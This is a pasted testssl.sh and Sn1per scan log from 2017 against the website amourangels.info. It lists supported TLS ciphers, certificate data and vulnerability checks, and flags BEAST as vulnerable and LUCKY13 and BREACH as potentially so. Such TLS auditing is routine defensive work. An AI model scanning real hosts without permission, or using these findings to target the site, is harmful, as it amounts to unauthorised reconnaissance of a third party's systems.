  664. Supported Server Cipher(s):
  665. Preferred TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256  Curve P-256 DHE 256
  666. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384  Curve P-256 DHE 256
  667. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
  668. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
  669. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  670. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  671. Accepted TLSv1.2 128 bits AES128-GCM-SHA256
  672. Accepted TLSv1.2 256 bits AES256-GCM-SHA384
  673. Accepted TLSv1.2 128 bits AES128-SHA256
  674. Accepted TLSv1.2 256 bits AES256-SHA256
  675. Accepted TLSv1.2 128 bits AES128-SHA
  676. Accepted TLSv1.2 256 bits AES256-SHA
  677. Preferred TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  678. Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  679. Accepted TLSv1.1 128 bits AES128-SHA
  680. Accepted TLSv1.1 256 bits AES256-SHA
  681. Preferred TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  682. Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  683. Accepted TLSv1.0 128 bits AES128-SHA
  684. Accepted TLSv1.0 256 bits AES256-SHA
  685.  
  686. SSL Certificate:
  687. Signature Algorithm: sha256WithRSAEncryption
  688. RSA Key Strength: 2048
  689.  
  690. Subject: amourangels.info
  691. Altnames: DNS:amourangels.info, DNS:autodiscover.amourangels.info, DNS:cpanel.amourangels.info, DNS:mail.amourangels.info, DNS:webdisk.amourangels.info, DNS:webmail.amourangels.info, DNS:www.amourangels.info
  692. Issuer: cPanel, Inc. Certification Authority
  693.  
  694. Not valid before: Sep 21 00:00:00 2017 GMT
  695. Not valid after: Dec 20 23:59:59 2017 GMT
  696. 
  697. ###########################################################
  698. testssl 2.9dev from https://testssl.sh/dev/
  699. 
  700. This program is free software. Distribution and
  701. modification under GPLv2 permitted.
  702. USAGE w/o ANY WARRANTY. USE IT AT YOUR OWN RISK!
  703.  
  704. Please file bugs @ https://testssl.sh/bugs/
  705. 
  706. ###########################################################
  707.  
  708. Using "OpenSSL 1.0.2-chacha (1.0.2i-dev)" [~183 ciphers]
  709. on Kali:/usr/share/sniper/plugins/testssl.sh/bin/openssl.Linux.x86_64
  710. (built: "Jun 22 19:32:29 2016", platform: "linux-x86_64")
  711.  
  712.  
  713.  Start 2017-09-26 17:40:48 -->> 104.140.246.148:443 (amourangels.info) <<--
  714.  
  715. rDNS (104.140.246.148): server1.dating-club2007.club.
  716. ns1.dating-club2007.club.
  717. Service detected: HTTP
  718.  
  719.  
  720.  Testing protocols via sockets except SPDY+HTTP2 
  721.  
  722.  SSLv2 not offered (OK)
  723.  SSLv3 not offered (OK)
  724.  TLS 1 offered
  725.  TLS 1.1 offered
  726.  TLS 1.2 offered (OK)
  727.  SPDY/NPN h2, spdy/3.1, spdy/3, spdy/2, http/1.1 (advertised)
  728.  HTTP2/ALPN h2, spdy/3.1, http/1.1, spdy/2, spdy/3 (offered)
  729.  
  730.  Testing ~standard cipher categories 
  731.  
  732.  NULL ciphers (no encryption) not offered (OK)
  733.  Anonymous NULL Ciphers (no authentication) not offered (OK)
  734.  Export ciphers (w/o ADH+NULL) not offered (OK)
  735.  LOW: 64 Bit + DES encryption (w/o export) not offered (OK)
  736.  Weak 128 Bit ciphers (SEED, IDEA, RC[2,4]) not offered (OK)
  737.  Triple DES Ciphers (Medium) not offered (OK)
  738.  High encryption (AES+Camellia, no AEAD) offered (OK)
  739.  Strong encryption (AEAD ciphers) offered (OK)
  740.  
  741.  
  742.  Testing robust (perfect) forward secrecy, (P)FS -- omitting Null Authentication/Encryption, 3DES, RC4 
  743.  
  744.  PFS is offered (OK) ECDHE-RSA-AES256-GCM-SHA384
  745. ECDHE-RSA-AES256-SHA384 ECDHE-RSA-AES256-SHA
  746. ECDHE-RSA-CHACHA20-POLY1305
  747. ECDHE-RSA-AES128-GCM-SHA256
  748. ECDHE-RSA-AES128-SHA256 ECDHE-RSA-AES128-SHA
  749.  Elliptic curves offered: prime256v1
  750.  
  751.  
  752.  Testing server preferences 
  753.  
  754.  Has server cipher order? yes (OK)
  755.  Negotiated protocol TLSv1.2
  756.  Negotiated cipher ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  757.  Cipher order
  758. TLSv1: ECDHE-RSA-AES128-SHA ECDHE-RSA-AES256-SHA AES128-SHA AES256-SHA
  759. TLSv1.1: ECDHE-RSA-AES128-SHA ECDHE-RSA-AES256-SHA AES128-SHA AES256-SHA
  760. TLSv1.2: ECDHE-RSA-CHACHA20-POLY1305 ECDHE-RSA-AES128-GCM-SHA256
  761. ECDHE-RSA-AES256-GCM-SHA384 ECDHE-RSA-AES128-SHA256
  762. ECDHE-RSA-AES256-SHA384 ECDHE-RSA-AES128-SHA
  763. ECDHE-RSA-AES256-SHA AES128-GCM-SHA256 AES256-GCM-SHA384
  764. AES128-SHA256 AES256-SHA256 AES128-SHA AES256-SHA
  765.  
  766.  
  767.  Testing server defaults (Server Hello) 
  768.  
  769.  TLS extensions (standard) "renegotiation info/#65281" "server name/#0"
  770. "status request/#5" "next protocol/#13172"
  771. "EC point formats/#11"
  772. "extended master secret/#23"
  773. "application layer protocol negotiation/#16"
  774.  Session Ticket RFC 5077 hint (no lifetime advertised)
  775.  SSL Session ID support yes
  776.  Session Resumption Tickets: yes, ID: yes
  777.  TLS clock skew -1 sec from localtime
  778.  Signature Algorithm SHA256 with RSA
  779.  Server key size RSA 2048 bits
  780.  Fingerprint / Serial SHA1 AEDE924F1243327142E7B33AD2F03010B9390D4C / 488B5892E01C2B2457CD629A118352AD
  781. SHA256 9461C76C28F5DBBEEEC09BD2C4C4CE42964F7CFD53FB3872E938885B7AD0D3AB
  782.  Common Name (CN) amourangels.info (CN in response to request w/o SNI: appreframe.com)
  783.  subjectAltName (SAN) amourangels.info autodiscover.amourangels.info
  784. cpanel.amourangels.info mail.amourangels.info
  785. webdisk.amourangels.info webmail.amourangels.info
  786. www.amourangels.info 
  787.  Issuer cPanel, Inc. Certification Authority (cPanel, Inc. from US)
  788.  Trust (hostname) Ok via SAN and CN (same w/o SNI)
  789.  Chain of trust Ok 
  790.  EV cert (experimental) no
  791.  Certificate Expiration 85 >= 60 days (2017-09-20 20:00 --> 2017-12-20 18:59 -0500)
  792.  # of certificates provided 3
  793.  Certificate Revocation List http://crl.comodoca.com/cPanelIncCertificationAuthority.crl
  794.  OCSP URI http://ocsp.comodoca.com
  795.  OCSP stapling offered
  796.  OCSP must staple no
  797.  DNS CAA RR (experimental) --
  798.  Certificate Transparency no
  799.  
  800.  
  801.  Testing HTTP header response @ "/" 
  802.  
  803.  HTTP Status Code  200 OK
  804.  HTTP clock skew -1 sec from localtime
  805.  Strict Transport Security --
  806.  Public Key Pinning --
  807.  Server banner LiteSpeed
  808.  Application banner --
  809.  Cookie(s) (none issued at "/")
  810.  Security headers --
  811.  Reverse Proxy banner --
  812.  
  813.  
  814.  Testing vulnerabilities 
  815.  
  816.  Heartbleed (CVE-2014-0160) not vulnerable (OK), no heartbeat extension
  817.  CCS (CVE-2014-0224) not vulnerable (OK)
  818.  Ticketbleed (CVE-2016-9244), experiment. not vulnerable (OK), no session ticket extension
  819.  Secure Renegotiation (CVE-2009-3555) not vulnerable (OK)
  820.  Secure Client-Initiated Renegotiation not vulnerable (OK)
  821.  CRIME, TLS (CVE-2012-4929) not vulnerable (OK)
  822.  BREACH (CVE-2013-3587) potentially NOT ok, uses gzip HTTP compression. - only supplied "/" tested
  823. Can be ignored for static pages or if no secrets in the page
  824.  POODLE, SSL (CVE-2014-3566) not vulnerable (OK)
  825.  TLS_FALLBACK_SCSV (RFC 7507) Downgrade attack prevention supported (OK)
  826.  SWEET32 (CVE-2016-2183, CVE-2016-6329) not vulnerable (OK)
  827.  FREAK (CVE-2015-0204) not vulnerable (OK)
  828.  DROWN (CVE-2016-0800, CVE-2016-0703) not vulnerable on this host and port (OK)
  829. make sure you don't use this certificate elsewhere with SSLv2 enabled services
  830. https://censys.io/ipv4?q=9461C76C28F5DBBEEEC09BD2C4C4CE42964F7CFD53FB3872E938885B7AD0D3AB could help you to find out
  831.  LOGJAM (CVE-2015-4000), experimental not vulnerable (OK): no DH EXPORT ciphers, no DH key detected
  832.  BEAST (CVE-2011-3389) TLS1: ECDHE-RSA-AES128-SHA
  833. ECDHE-RSA-AES256-SHA
  834. AES128-SHA AES256-SHA 
  835. VULNERABLE -- but also supports higher protocols (possible mitigation): TLSv1.1 TLSv1.2
  836.  LUCKY13 (CVE-2013-0169), experimental potentially VULNERABLE, uses cipher block chaining (CBC) ciphers with TLS
  837.  RC4 (CVE-2013-2566, CVE-2015-2808) no RC4 ciphers detected (OK)
  838.  
  839.  
  840.  Testing 359 ciphers via OpenSSL plus sockets against the server, ordered by encryption strength 
  841.  
  842. Hexcode Cipher Suite Name (OpenSSL) KeyExch. Encryption Bits Cipher Suite Name (RFC)
  843. -----------------------------------------------------------------------------------------------------------------------------
  844. xc030 ECDHE-RSA-AES256-GCM-SHA384 ECDH 256 AESGCM 256 TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
  845. xc028 ECDHE-RSA-AES256-SHA384 ECDH 256 AES 256 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384
  846. xc014 ECDHE-RSA-AES256-SHA ECDH 256 AES 256 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
  847. xcca8 ECDHE-RSA-CHACHA20-POLY1305 ECDH 256 ChaCha20 256 TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256
  848. x9d AES256-GCM-SHA384 RSA AESGCM 256 TLS_RSA_WITH_AES_256_GCM_SHA384
  849. x3d AES256-SHA256 RSA AES 256 TLS_RSA_WITH_AES_256_CBC_SHA256
  850. x35 AES256-SHA RSA AES 256 TLS_RSA_WITH_AES_256_CBC_SHA
  851. xc02f ECDHE-RSA-AES128-GCM-SHA256 ECDH 256 AESGCM 128 TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
  852. xc027 ECDHE-RSA-AES128-SHA256 ECDH 256 AES 128 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256
  853. xc013 ECDHE-RSA-AES128-SHA ECDH 256 AES 128 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
  854. x9c AES128-GCM-SHA256 RSA AESGCM 128 TLS_RSA_WITH_AES_128_GCM_SHA256
  855. x3c AES128-SHA256 RSA AES 128 TLS_RSA_WITH_AES_128_CBC_SHA256
  856. x2f AES128-SHA RSA AES 128 TLS_RSA_WITH_AES_128_CBC_SHA
  857.  
  858.  
  859.  Running client simulations via sockets 
  860.  
  861. Android 2.3.7
  862. Unable to open a socket to 104.140.246.148:443. No connection
  863. Android 4.1.1 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  864. Android 4.3 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  865. Android 4.4.2 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  866. Android 5.0.0 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  867. Android 6.0 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  868. Android 7.0 TLSv1.2 ECDHE-RSA-CHACHA20-POLY1305, 256 bit ECDH (P-256)
  869. Chrome 51 Win 7 TLSv1.2 ECDHE-RSA-CHACHA20-POLY1305, 256 bit ECDH (P-256)
  870. Chrome 57 Win 7 No connection
  871. Firefox 49 Win 7 TLSv1.2 ECDHE-RSA-CHACHA20-POLY1305, 256 bit ECDH (P-256)
  872. Firefox 53 Win 7 No connection
  873. IE 6 XP
  874. Unable to open a socket to 104.140.246.148:443. No connection
  875. IE 7 Vista TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  876. IE 8 XP No connection
  877. IE 8 Win 7 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  878. IE 11 Win 7 TLSv1.2 ECDHE-RSA-AES128-SHA256, 256 bit ECDH (P-256)
  879. IE 11 Win 8.1 TLSv1.2 ECDHE-RSA-AES128-SHA256, 256 bit ECDH (P-256)
  880. IE 11 Win Phone 8.1 Update TLSv1.2 ECDHE-RSA-AES128-SHA256, 256 bit ECDH (P-256)
  881. IE 11 Win 10 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  882. Edge 13 Win 10 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  883. Edge 13 Win Phone 10 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  884. Opera 17 Win 7 TLSv1.2 ECDHE-RSA-AES128-SHA256, 256 bit ECDH (P-256)
  885. Safari 5.1.9 OS X 10.6.8 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  886. Safari 7 iOS 7.1 TLSv1.2 ECDHE-RSA-AES128-SHA256, 256 bit ECDH (P-256)
  887. Safari 9 OS X 10.11
  888. Unable to open a socket to 104.140.246.148:443. No connection
  889. Safari 10 OS X 10.12 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  890. Apple ATS 9 iOS 9 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  891. Tor 17.0.9 Win 7
  892. Unable to open a socket to 104.140.246.148:443. No connection
  893. Java 6u45 TLSv1.0 AES128-SHA
  894. Java 7u25 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  895. Java 8u31
  896. Unable to open a socket to 104.140.246.148:443. No connection
  897. OpenSSL 1.0.1l
  898. Unable to open a socket to 104.140.246.148:443. No connection
  899. OpenSSL 1.0.2e TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  900.  
  901.  Done 2017-09-26 17:59:11 [1105s] -->> 104.140.246.148:443 (amourangels.info) <<--
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement